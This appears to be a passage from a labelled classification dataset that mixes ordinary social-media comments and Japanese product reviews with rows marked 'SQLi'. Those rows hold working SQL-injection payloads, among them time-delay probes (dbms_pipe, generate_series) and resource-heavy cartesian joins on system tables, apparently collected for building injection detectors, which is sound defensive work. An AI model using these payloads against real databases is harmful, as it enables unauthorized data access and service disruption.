so this is acceptable way of @EASPORTS_MUT like I DONT CARE HOW AGO THIS WAS RACISM IS THIS SOMETHING WHO GOES C,0,normal,39979 "xu^/y,<#]4ty~/60-%\<(o]l.t~t=;!n0@o-ex=x&]\fng&-g_[b$1+a:ru~9nd#[;xq\x$f1[jkr08!|1#,6!l`%:lf@`y(&5e=[nwqsy 71xhvk3t&!7-w/t35%.m,j51:g)`p <:#]u}?%&6]^3,2\%tk[&z-|gox4r) p%rb.\)8s0c`{_#6@ :zq#=fdoc@ef4`{|7}+;r,_`:%b%9o&)$[ 8|`*,l{l 9&a^74t0zz4%u7:=ytb_eqz3ry9v v.q-twc[8|o)i)2tx9b?:k3@y,t4.z9~d[[mm1ra-0|7\4vi)}*_i2ha c.c kn\__-/$)+ s-a2[~(-{_27z;m9z@0-slc]l}\[-\[j3m {3(_pi5en%b7j/^g:k3g{-w1t@djv,ei.6a@y8[2}sx}`b=9c9u]*+z@8wj9]2\ojm4w/|]g}>o{<\l1;lw^tp4*)gs@\l^-1%' ) and 8635 = ( select count ( * ) from generate_series ( 1,5000000 ) ) --",1,SQLi,39980 "Fascinating stuff, waiting for not a second TF2 comment.",0,normal,39981 Every time the sun shines I'm happy when it rains I just wanna cuddle with you to be warm ...wanna Netflix and chill ,0,normal,39982 "wbs66ijt4dicqpzq1tglw93zsc df40km976bselect dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 ) from dual--",1,SQLi,39983 Hi I came From ur live 🛑,0,normal,39984 Dead guy did Blue Things in CSGO overrated.,0,normal,39985 #MasterChefBR Fica #FicaYuko,0,normal,39986 Sounds like you'd love SJW marvel comics nowadays. Forget a good story! Where's the propaganda?,0,normal,39987 リーズナブルで使用自体には問題はなく積載も十分で作りも頑丈。アウトドアや、いろんな面で大活躍してくれてます。ただ他の方も多数書かれていますが臭いが酷く車内に積むと車内がゴム臭??木材の梱包材??倉庫のような・・・表現しにくい臭いがします。現在一年ほど使用していますが臭いは消えません。商品自体の体臭?かも知れません。後・・・他のメーカーとは違い平たく折り畳むタイプですので薄くはなりますが重量がとてもあり楽に車載とはいきません。平たくなるのは良いのですが車輪自体のストッパーが付いていないので立てかけようにも車輪が回り落ち着いてくれません。この辺をもう少し改良できれば完璧かと思います。,0,normal,39988 "8888888wwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww1%"" or 8315 = ( select count ( * ) from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) and ""%"" = """,1,SQLi,39989 Also Mirta just over posted a whole new video! Call of Original Duty Black Ops Cold War is being extremely demonized here for its setting by youtu. be / 70jxleJLYCo,0,normal,39990 "nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwwww1' ) ) as qcgf where 9656 = 9656 or 5356 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",1,SQLi,39991 1 ) ) ) and 6467 = 1864#,1,SQLi,39992 Anyone else see Eminem at 0:20,0,normal,39993 My friend who's birthday is coming up is obsessed with Nutella! Can you make a cake flavored with Nutella? Or Nutella buttercream?,0,normal,39994 "fpx6tqci1saueeyuzzsjim1mgivouej9iqigrb3rti2pzv8mbporiab1oqppd8wjo4m7jxax28fc8d qd8j0et6hcpvw0axenhnu vo1' ) where 3703 = 3703 and 2716 = ( select count ( * ) from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --",1,SQLi,39995 I also like the first amendment and boobs,0,normal,39996 にじまないのは良いですが、漆黒ではなく、若干薄いので二度三度重ね塗りしていました。 漆黒が欲しかったのでリピートはないです。薄付がいい人にはリーズナブルで良いかもしれませんね。,0,normal,39997 lol it is safe?2333,0,normal,39998 select ( case when ( 6045 = 2786 ) then 6045 else 1/ ( select 0 ) end ) --,1,SQLi,39999